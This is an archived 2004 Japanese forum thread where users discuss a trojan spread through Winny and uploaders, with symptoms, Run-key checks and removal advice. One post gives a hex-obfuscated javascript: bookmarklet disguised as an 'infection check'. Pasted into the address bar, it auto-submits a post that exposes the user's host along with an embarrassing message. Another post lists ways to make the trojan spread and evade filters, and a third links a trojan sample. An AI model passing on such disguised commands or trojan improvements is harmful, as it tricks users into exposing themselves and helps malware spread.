- 1 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/11 12:10:15 ID:j8DDPfNG]
- Winnyで流れているワーム、ウイルス等の報告・調査・対処をするスレです。
質問はテンプレを読んでからにして下さい。
読まずに質問しても「テンプレ嫁」と切り返されるだけです。
余裕があれば過去ログにも目を通してください。
なお、ここは初心者の質問スレではありません。
■流行種
・元祖Antinny系 ・キンタマ系 ・batファイル ・スクリーンセーバー etc
■流行感染パターン
・exeの前にスペースたくさん(例:「秘密の写真.jpg .exe」等)
・拡張子が.folderに変更されたHTMLからexeを実行させる
・autorunからbatファイルを実行させる
・スタートアップに解凍させ、再起動後exeを実行させる
■DL後のちょっとした注意
・落としたファイルは必ずウイルススキャンする
・exeファイルはうかつに実行しない
・ファイルのアイコンが偽装されてないか確認する
■全ての感染者に共通の、絶対確実な対処方法
ハードディスクをフォーマットした上で、Windowsの再インストールをする。
上書きインストールではダメです。
現在ハードディスクにあるデータは消えるので、待避するなり諦めるなりしてください。
前スレ
【警報】Winnyを狙ったワーム・ウイルス情報 Part25
tmp4.2ch.net/test/read.cgi/download/1093270545/l50
テンプレまとめ www.geocities.jp/kemkzuenc/Antinny.html
Antinny対策サイト ttp://nyweb.hp.infoseek.co.jp/
- 699 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:25:47 ID:Y5vbHsBs]
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
ここら辺もregeditで見とけよ
- 700 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:27:59 ID:rtwkFYAH]
- shellsystem.exe以外は無視してOK?
あとノートンで遮断した場合は画像は流れない?
- 701 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:34:09 ID:XZhKNgqY]
- なんだか調子に乗って改造した奴が先に逮捕されそう
- 702 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:37:36 ID:rMURrwFg]
- 牛に我慢させるか
- 703 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:40:22 ID:EiFN9IZi]
- 誤爆だ わりぃ
- 704 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:44:18 ID:62NRg8JO]
- これならとってもわかりやすい画像ですな
v.isp.2ch.net/up/6e671bb4b867.jpg もう典型的かと
- 705 名前:[名無し]さん(bin+cue).rar [04/09/23 04:58:57 ID:MZi2DiBQ]
- これxp以外は平気なの?
- 706 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 04:59:21 ID:SFKAhjW3]
- ノートンインターネットセキュリティの様なものが常駐してたら
プログラムによって勝手に晒されるようなことは無いよな?
- 707 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:00:55 ID:JtMoVLJN]
- plaza.rakuten.co.jp/sakinya/
- 708 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:02:56 ID:g70Ywgh6]
- >>705
どうしてそういう結論になるのかが判らん。
>>706
設定次第。学習モードとかでユーザが勝手な通信を許可したら、
なんぼセキュリティソフトが入っててもそりゃアウトにもなる。
- 709 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:04:36 ID:Q7dG25BA]
- アップローダから知らないファイル落としたりしなきゃ、感染しないんだよな?
こうもいっぱいかかってると、最近何も落としてないのに不安になる
- 710 名前:[名無し]さん(bin+cue).rar [04/09/23 05:04:47 ID:MZi2DiBQ]
- >>708
ボロPCで感染実験してみたのさ(OS ME)
そんで晒されるか待ってるだけど、一向にうpされないんでつよ。
- 711 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:05:29 ID:4TL6YJ26]
- まぁ拡張子表示はしっかりしとけってこったな
- 712 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:09:58 ID:xduUn+v/]
- >>705
苺キンタマ(仮)は、Windows 98以降なら感染というか、踏んだら効果を示す
>>706
httpを使うからWebが見られる環境ならアウト(f/wで80番閉じてれば別だが、web見られないよ)
- 713 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:10:25 ID:5x3EooTF]
- v.isp.2ch.net/up/4250ab8226aa.jpg
貴様ッ見ているな!
- 714 名前:[名無し]さん(bin+cue).rar [04/09/23 05:13:40 ID:MZi2DiBQ]
- windows\shellsystem.exeはあったんだけど
レジストリは追加されてないんだよね
これじゃまだ感染しとらんのかね?
もう一回踏んでみるかな。。。
- 715 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:14:27 ID:57yhE0eV]
- PFW入れてれば、ウィルスが通信しようとしたのを検知してくれるんじゃないかい
何でもOKで通してれば意味無いけど
あと、SP2のPFWはアウトバウンド検知してくれないんだっけ?
- 716 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:18:37 ID:aY8YkHOS]
- ttp://strawberry.web-sv.com/cgi/up/ia/up1360.zip
トロイらしいんだけど、だれか解析頼む。
- 717 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:19:45 ID:xduUn+v/]
- >>715
ウイルスというか、現時点ではトロイなんだが
通信といっても、書き込みと変わらんからf/wでの検知は難しい
XP SP2のf/wは、外→内のみ。
- 718 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:25:36 ID:JsiucGEH]
- 結局はキンタマと同じでexeを実行しなければいいってことだけど
XPは標準で表示しないしな。
何でこんな仕様なんだorz
ところでアップローダスレを自分のユーザ名で検索してしまった香具師
ノシ
- 719 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:25:48 ID:eq0QK75x]
- 俺もサンプルとして捕獲しておきたいんだが、苺1の1360の三点セットってやつでいいんだよね。
- 720 名前:[名無し]さん(bin+cue).rar [04/09/23 05:27:02 ID:Ypzo5dny]
- ってかny関係ないじゃん・・・
- 721 名前:[名無し]さん(bin+cue).rar [04/09/23 05:28:00 ID:0ylh05j4]
- スレタイでややこしくなってるね
- 722 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:28:17 ID:57yhE0eV]
- >>717
普通のPFWってEXEファイル単位で通信を検知して知らせてくれんじゃないの?
ループバックでも利用してない限りは大丈夫だと思うが
- 723 名前:719 mailto:sage [04/09/23 05:29:12 ID:eq0QK75x]
- OK、これであってたようだ。
- 724 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:29:54 ID:MqBRPt/h]
- >httpを使うからWebが見られる環境ならアウト(f/wで80番閉じてれば別だが、web見られないよ)
>f/w
- 725 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:33:52 ID:Pi3bt/OK]
- おもしろそいので俺も捕獲しとこ
- 726 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:34:21 ID:AH6SroMo]
- さて、キンタマと違って
特定のサイトやアップローダーに書き込みを行う以上
そこから業務妨害で損害賠償請求されてもおかしくないトロイなんだが
ま、日本の警察じゃ作成者を特定できんだろうな・・・
でも、苺にexeファイルをアップした人間を特定して締め上げればいいのか?
- 727 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:34:22 ID:Pi3bt/OK]
- 間違え;y=ー( ゚д゚)・∵. ターン
- 728 名前:[名無し]さん(bin+cue).rar [04/09/23 05:50:14 ID:U98tvZkV]
- 要望まとめ
・複数のうpろだをランダムに使うように(2ちゃんねるアップローダーはやめれ)
・デスクトップ画像以外もうpするように(kakikomi.txtとか)
・繁殖機能。zipで適当なファイルといっしょにウィルス本体も固めてうp。
・Rock54対策。NGワードが含まれる書き込みが規制されるから晒しテンプレを複数作れば大丈夫か?
- 729 名前:[名無し]さん(bin+cue).rar [04/09/23 05:50:39 ID:VGKgqq6T]
- なんで怪しいexeファイルを実行すんのかなって思ってたけど
拡張子を表示しない設定だと初心者はわからんわな〜
- 730 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:52:17 ID:IFT2b9V5]
- >>728
要望するなよ(笑)
- 731 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:52:23 ID:4TL6YJ26]
- セキュリティに対する意識ってなかなかあがらないな
- 732 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:54:24 ID:fgnK5pHv]
- >>728
共犯者キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
- 733 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:56:44 ID:tcoLxpqV]
- 人間のロリ好きってアニメ、ゲームも好む傾向があるんだな。
なかなか興味深かった。
- 734 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 05:58:31 ID:cTDJ+/Lv]
- kakikomi晒されたら辛いな
他の情報で個人割れてたらきっと死人が出る
- 735 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:07:00 ID:JsiucGEH]
- exeごとに通信制御するNortonとかのFWは
ポート80番使ってようとブロックするんじゃないの?
- 736 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:09:13 ID:IFT2b9V5]
- >>735
する。というか、初物がソケットひらこうとしたときに騒ぐ。
- 737 名前:[名無し]さん(bin+cue).rar [04/09/23 06:10:23 ID:0ylh05j4]
- で、エロの魔力で許可するをクリック!
- 738 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:18:26 ID:0jfdhz8j]
-
簡易プロテクト?
C:\WINDOWS>copy notepad.exe shellsystem.exe
C:\WINDOWS>attrib +R shellsystem.exe
とりあえず実験用の98SE環境ではうまくいった。
メインマシンで実験する度胸はないので、XPなどでは不明。
- 739 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:25:02 ID:J6w/KxT0]
- これ犯人たどれるだろ。ネットカフェとかかな?
- 740 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:26:03 ID:IFT2b9V5]
- >>739
踏み台はさまってたら無理
- 741 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:29:08 ID:J6w/KxT0]
- >>740
プロバイダに問い合わせりゃアクセス記録のこってんじゃないの?
- 742 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:32:12 ID:IFT2b9V5]
- >>741
ドコのプロバイダに問い合わせるの?
- 743 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:32:29 ID:JsiucGEH]
- 海外プロキシを多段でかましてればよほどのことがないと
たどれてもたどらないと思う。
- 744 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:35:42 ID:J6w/KxT0]
- >>742
踏み台のだよ。
- 745 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:38:02 ID:IFT2b9V5]
- >>744
もし俺が犯人だったとしたら、踏み台にしろ串にしろ
一段ではやらないだろうね。捕まりたくないし。
- 746 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:40:16 ID:xduUn+v/]
- >>739
追求のキーになるのが >>688で報告した
> Software\Meropa ??なんだろこのディレクトリ
なんだが、こんなディレクトリを作るアプリは、かなーり特殊な
半導体設計用のものらしい。こんなの入れてる人間は国内では限られる。
ここから手繰るのがよさげ。スキルは相当と思えるので、配布元から掘るのは難しそう
- 747 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:40:33 ID:J6w/KxT0]
- >>745
俺がもし被害者だったら100段くらいまでは頑張ってたどるよw
この手のウイルスは犯人が殺されても不思議じゃないと思うんだが。
- 748 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:44:13 ID:xduUn+v/]
- >>747
そこいらに、いくらでもある
WEP無効の無線LANを踏み台にしてたら、
多段串・海外串なんか使わなくても
たどるのは難しい。
- 749 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:44:40 ID:J6w/KxT0]
- 殺されるは言い過ぎかw でもなんらかの報復は受けると思う。
つーか踏み台に時限セットされたものなら辿るの不可能っぽいな・・
- 750 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:45:30 ID:zW53Q5jb]
- ネカフェで時限式アップロードするように仕込んだとか。
- 751 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 06:46:34 ID:99Ier2R9]
- 頑張れ。
- 752 名前:[名無し]さん(bin+cue).rar [04/09/23 07:02:00 ID:CBy0Cio6]
- こうゆうのを見ると2chやnyする人ってヒッ●ーだけなのかなって思うね
v.isp.2ch.net/up/fa86350a6026.jpg
ウイルスに気づかずに必死に抜いている人1名w
- 753 名前:469 mailto:sage [04/09/23 07:04:35 ID:kh8TR4yq]
- これって本人達が寝てる間は安全なんだね。
- 754 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 07:08:11 ID:kh8TR4yq]
- 数字消すの忘れた・・・_| ̄|○
- 755 名前:[名無し]さん(bin+cue).rar [04/09/23 07:08:12 ID:CBy0Cio6]
- どうせなら、SS、PC名だけじゃなくて、
IP・ホストも晒してほしかったな
- 756 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 07:12:12 ID:IFT2b9V5]
- >>752
これは狙ってやってる気がしないではないな(笑)
- 757 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 07:45:55 ID:CtAJ3p7u]
- 俺はこんなウイルスは怖くて作れないな
何が怖いって狙われるのが怖いね
作った奴は絶対に捕まらないと思ってるんだから
本気になって追ってみたら面白いことになるかも
例えばウイルス作者が警察だったりしたらヤバイだろうし。
そうじゃなくても作った奴は確実に追われた後人生終わるだろうし
そんな一世一代の大事俺は出来ない
- 758 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 08:14:59 ID:wZ9Gu9IX]
- 新種ウイルスと聞いてきました
- 759 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 08:15:35 ID:iqYKdWhe]
- 面白い事考える奴もいるもんだな
- 760 名前:[名無し]さん(bin+cue).rar [04/09/23 08:18:41 ID:U98tvZkV]
- Winnyは関係ないけどな。
今やってるのはShareで回ってるふしあなで2ch書き込みと半虹の苺キンタマ
- 761 名前:[名無し]さん(bin+cue).rar [04/09/23 08:25:55 ID:U98tvZkV]
- 便乗してこれまで流行ってる
JavaScript:document.body.innerHTMLのガイドライン2
that3.2ch.net/test/read.cgi/gline/1076853643/595-586
感染確認するには
2ch専用ブラウザを使用している人は、IEなどの一般的なブラウザでこのスレを開いておく。
1、
javascript:s='7769746828646f63756d656e742e666f726d735b305d297b
46524f4d2e76616c75653d2766757369616e6173616e273b4d455353414
7452e76616c75653d275c75333045445c75333045415c75373533425c75
353043465c75333034465c75333036305c75333035355c7533303434273
b7375626d69742e636c69636b28293b7d';for(l=0,e="";l<s.length;l+=2)e+=
'%'+s.substr(l,2);eval(unescape(e));
をクリップボードにコピーし、メモ帳などのテキストエディタに貼り付ける。
2、 改行を外して1行にする。
3、 1行にしたものをクリップボードにコピーし、アドレスバーに貼り付ける。
4、 Enterを押す(もしくは「移動」をクリックする)。
エラーが出れば感染してます
- 762 名前:[名無し]さん(bin+cue).rar [04/09/23 08:26:46 ID:U98tvZkV]
- >>761
参照間違えた・・
that3.2ch.net/test/read.cgi/gline/1076853643/595-596
- 763 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 08:27:19 ID:1gUyhrM3]
-
- 764 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 08:51:04 ID:SPCjNc3y]
- 俺はペケピーがはじめての初心者だが、拡張子表示は真っ先にやったぞ…。
まぁ、かつては黒羊とメールストームをふんだ苦い経験持ちだが。
- 765 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:07:42 ID:SY1J+4JW]
- >>761
ワロタ
ロリ画像ですか
- 766 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:08:11 ID:GmtpX3PS]
- 【使用OS】WinXP
【WindowsUpdateしてるか】はい。
【AntiVirusは】 ??
【ちゃんとUpdateしてるか】??
【スキャンした結果】オンラインにてスキャン
【オンラインスキャンしたならその結果は】いつもなら数個出るのに、不自然なぐらい何も検出されませんでした。
【Winnyのバージョン】使ってません。ネットでウィルス貰いました。
【Winny歴、総DL量は】 無し
【テンプレを読んだか】 はい。
【テンプレにある対策を実行したか】 実行しました。特に何も無かったです。
【症状か具体的に、分かる限りすべて書く】 何となく、重い。動作が鈍い。
【何をしたらそんなことになったのか】 うpされてたファイルを開いたら。
【これまでにとった措置】オンラインスキャンのみ。
- 767 名前:[名無し]さん(bin+cue).rar [04/09/23 09:12:14 ID:U98tvZkV]
- >>766
(写真集) (ロリータ) 水原友里.exe
(写真集) (ロリータ) 相田香奈子.exe
コピー 〜 (写真集) (ロリータ) 河瀬菜美.exe
どれか開いた?
- 768 名前:[名無し]さん(bin+cue).rar [04/09/23 09:19:52 ID:Jz5Ghtix]
- キンタマ作った香具師、逮捕されたのか
- 769 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:25:30 ID:GmtpX3PS]
- >>767
開いたというか、ダブルクリックして開こうとした。
どれだったか覚えてない…。多分、2回ぐらい開こうとした。
何か怪しかったし、急にPCの反応がおかしくなったから、速攻電源切りました。
その後にまた起動して、全部ゴミ箱に捨てて、ゴミ箱も空にしました。
- 770 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:28:46 ID:kh8TR4yq]
- >>769
もう遅いw
とりあえず↓に来い。
削除の方法が分かるかもしれない。
アップローダーってずるい
idol.bbspink.com/test/read.cgi/ascii2d/1095880065/
- 771 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:28:49 ID:j/Jnnczc]
- >>769
今すぐネットを切断
C:\WINDOWSフォルダの中でshellsystem.exeを消せ
再起動して後は知ってるならレジストリの自動実行の辺りを探せ
急げ
- 772 名前:[名無し]さん(bin+cue).rar [04/09/23 09:29:12 ID:U98tvZkV]
- >>769
とりあえずユーザ名とコンピュータ名を晒せ。
マイコンピュータのプロパティから見れる。
- 773 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:30:19 ID:afWjuRcq]
- >>766
ご愁傷様
- 774 名前:[名無し]さん(bin+cue).rar [04/09/23 09:30:56 ID:0ylh05j4]
- >>685
を見て確認してみ
- 775 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:41:27 ID:P9SKfCRL]
- >>762
596 名前:水先案名無い人[sage] 投稿日:04/09/21(火) 22:21:33 ID:aLtl7+rE<
>>595のやつやると名前欄fusianasan、本文ロリ画像くださいで勝手に投稿されるってわけか?
597 名前:水先案名無い人[] 投稿日:04/09/21(火) 23:16:48 ID:raTTdWET<
16進でご苦労な事だ。
598 名前:p29d3b8.urawac00.ap.so-net.ne.jp[] 投稿日:04/09/21(火) 23:18:09 ID:ItaWKNCP<
ロリ画像ください
599 名前:水先案名無い人[sage] 投稿日:04/09/21(火) 23:18:27 ID:ItaWKNCP<
orz
600 名前:水先案名無い人[sage] 投稿日:04/09/22(水) 00:18:50 ID:8s+8uxdE<
おらは投稿確認が出て助かっただ
601 名前:水先案名無い人[sage] 投稿日:04/09/22(水) 01:00:01 ID:A3RcQubp<
そいえば、たいていの掲示板ってhttpだからポストする時に
暗号化されていないデータが云々のダイアログを出せるはずだが、
それを解除してる人って結構多いみたいだね。
602 名前:zaq3d2e96f7.zaq.ne.jp[] 投稿日:04/09/22(水) 02:42:09 ID:nVW0EyTb<
ロリ画像ください
603 名前:濡れ衣 zaq3d2e96f7.zaq.ne.jp ◆SbICHIROZ6 [sage] 投稿日:04/09/22(水) 02:43:59 ID:nVW0EyTb<
570はどうなるかちゃんと書いておいてくれよ。。
リモホ晒すのは構わないけど、テストスレになっちまうぞ
604 名前:水先案名無い人[sage] 投稿日:04/09/22(水) 03:55:11 ID:7PnzxniJ<
いかん、笑いが止まらんw
やらんでよかったw
- 776 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:47:30 ID:tcoLxpqV]
- ノートンでスキャン中の画像がよく晒されてたけど
対策ソフト入れてると安心するから簡単に引っかかるんじゃないの。
しかもこういう祭り時には無力。全くの無駄金だな。
- 777 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:53:59 ID:qlyssBj7]
- 拡張子表示は鬱陶しいし、長いスペースとかがあるから詳細表示のファイルの種類で判断してるなぁ
- 778 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:55:34 ID:GmtpX3PS]
- >>771
そのレジストリとやらは良く分からんが…
まあ、とりあえず初心者板で聞いてくる。
検索したらshellsystem.exeが見付かった。
とりあえず、急ぎます。ありがとう。
- 779 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 09:57:12 ID:cDvdfQLH]
- >拡張子表示は鬱陶しい
ハァ?
- 780 名前:[名無し]さん(bin+cue).rar [04/09/23 10:00:05 ID:/EYVc77v]
- 明かされてる画像みても無害?
- 781 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:01:16 ID:xduUn+v/]
- いくらノートン先生でも、登場したてのトロイにすぐには反応できませんぜ
今回の作成日時は、3本とも22日15:57 流されたのが夕方としても、まだ
10時間しかたってない。しかも踏んでるやつ大杉。
作者も、これほどの効果を期待してなかっただろーな。そうでなきゃアプロダ
が落ちるというのも考慮してると思う。この反応からして、ここ数日間に数種の
亜種が出てくると思う。トロイの改変も楽勝っぽいので、便乗犯も多そう。
一番のセキュリティホールは、ユーザーの意識だもんよ。
- 782 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:03:05 ID:Ze0M08FR]
- ちなみにキンタマが発見されたのが3月半ば。対応は3月末。
- 783 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:03:32 ID:kDRZUavo]
- 歴史は繰り返す。
- 784 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:05:29 ID:4TL6YJ26]
- そして人は学ばない
- 785 名前:[名無し]さん(bin+cue).rar [04/09/23 10:07:05 ID:7loVoFeI]
- mp3の名前などを勝手にいじるウィルスってあります?
- 786 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:08:25 ID:LvJ+JBBu]
- >>729
アイコンでわかるだろ?
- 787 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:12:17 ID:kDRZUavo]
- >>786
アイコンがフォルダアイコンに偽装されてるから無知が実行する。
- 788 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:16:24 ID:qJ0+JsGI]
- で、誰かウイルス駆除ソフト屋さんに報告したの?
- 789 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:23:29 ID:iqYKdWhe]
- >>780
画像自体は無害。
って、こんな程度の知識の人が踏むんだろうなぁ。
- 790 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:29:04 ID:ky5A4Ls4]
- >>789
ttp://www.microsoft.com/japan/security/security_bulletins/ms04-028e.asp
こんなのがあるから一概には大丈夫とは言えないかもしれない
- 791 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:30:06 ID:0lvmtZMl]
- >>789
っていう、おまえも相当やばいのだが
- 792 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:32:33 ID:cDvdfQLH]
- >>789
,、ァ
,、 '";ィ'
________ /::::::/l:l
─- 、::::;;;;;;;;;`゙゙''‐ 、 __,,,,......,,,,_/:::::::::/: !|
. : : : : : : `゙'ヽ、:::゙ヾ´::::::::::::::::::::::`゙゙゙'''‐'、. l| またまた ご冗談を
、、 . : : : : : : : : r'":::::::::::::::::::::::::,r':ぃ::::ヽ::::::::ヽ! ,、- 、
.ヽ:゙ヽ; : : : : : :ノ:::::::::::::::::::::;;、-、、゙::: rー-:'、 / }¬、
. \::゙、: : : :./::::::::::::::;、-''":::::::::: ,...,:::,::., :::':、 _,,/,, ,、.,/ }
ヽ:ヽ、 /::::::::::::::::::::::::: _ `゙''‐''" __,,',,,,___ /~ ヾ::::ツ,、-/
`ヽ、:::::::::;;;、、--‐‐'''''',,iニ- _| 、-l、,},,  ̄""'''¬-, ' ''‐-、 .,ノ'゙,i';;;;ツ
_,,,、-‐l'''"´:::::::' ,、-'" ,.X,_,,、-v'"''゙''yr-ヽ / ゙゙'ヽ、, ,.' j゙,,, ´ 7
,、-''" .l:::::::::::;、-''" ,.-' ゙、""ヾ'r-;;:l 冫、 ヽ、 / __,,.ノ:::::ヽ. /
l;、-'゙: ,/ ゞ=‐'"~゙゙') ./. \ / '''"/::::;:::;r-''‐ヽ
,、‐゙ ヽ:::::..,.r'゙ ,,. ,r/ ./ ヽ. ,' '、ノ''" ノ
,、‐'゙ ン;"::::::. "´ '゙ ´ / ゙、 ,' /
' //::::::::: {. V /
/ ./::::::::::::: ', / /
. / /:::::::::::::::::. ',. / ,.、 /
- 793 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:35:22 ID:iqYKdWhe]
- >>790-792
いやあ、もちろんgdiplus.dllは知ってますって。わざわざ書かなくていいかと思ったんだけど。
こんなにレスが付くとは…。
- 794 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:36:31 ID:cDvdfQLH]
- >>793
,、ァ
,、 '";ィ'
________ /::::::/l:l
─- 、::::;;;;;;;;;`゙゙''‐ 、 __,,,,......,,,,_/:::::::::/: !|
. : : : : : : `゙'ヽ、:::゙ヾ´::::::::::::::::::::::`゙゙゙'''‐'、. l| またまた ご冗談を
、、 . : : : : : : : : r'":::::::::::::::::::::::::,r':ぃ::::ヽ::::::::ヽ! ,、- 、
.ヽ:゙ヽ; : : : : : :ノ:::::::::::::::::::::;;、-、、゙::: rー-:'、 / }¬、
. \::゙、: : : :./::::::::::::::;、-''":::::::::: ,...,:::,::., :::':、 _,,/,, ,、.,/ }
ヽ:ヽ、 /::::::::::::::::::::::::: _ `゙''‐''" __,,',,,,___ /~ ヾ::::ツ,、-/
`ヽ、:::::::::;;;、、--‐‐'''''',,iニ- _| 、-l、,},,  ̄""'''¬-, ' ''‐-、 .,ノ'゙,i';;;;ツ
_,,,、-‐l'''"´:::::::' ,、-'" ,.X,_,,、-v'"''゙''yr-ヽ / ゙゙'ヽ、, ,.' j゙,,, ´ 7
,、-''" .l:::::::::::;、-''" ,.-' ゙、""ヾ'r-;;:l 冫、 ヽ、 / __,,.ノ:::::ヽ. /
l;、-'゙: ,/ ゞ=‐'"~゙゙') ./. \ / '''"/::::;:::;r-''‐ヽ
,、‐゙ ヽ:::::..,.r'゙ ,,. ,r/ ./ ヽ. ,' '、ノ''" ノ
,、‐'゙ ン;"::::::. "´ '゙ ´ / ゙、 ,' /
' //::::::::: {. V /
/ ./::::::::::::: ', / /
. / /:::::::::::::::::. ',. / ,.、 /
- 795 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:37:15 ID:iqYKdWhe]
- んー、でもよく考えると俺が間違ってるな。MSのGDI+の事も書けばよかった。
- 796 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:37:27 ID:xduUn+v/]
- 今回のに限っていえば、晒されてるjpegは今のとこ無害だからな。
便乗してアプロに仕込むやつもいそうだが
- 797 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:41:34 ID:xduUn+v/]
- つーか、GDI+対策しないで、今頃jpeg開く香具師が悪いと思われ
パッチがあがった時点から危険度急上昇だぞ
- 798 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:42:55 ID:EMRLV6EZ]
- jpgで感染!?(゚д゚)すんのかよ!?
- 799 名前:[名無し]さん(bin+cue).rar mailto:sage [04/09/23 10:45:36 ID:LvJ+JBBu]
- >>798
するよ〜、jpg見るどころか、うpロダ逝ったら即感染ですよ
怖いよ〜ウィルスわ
|
 |
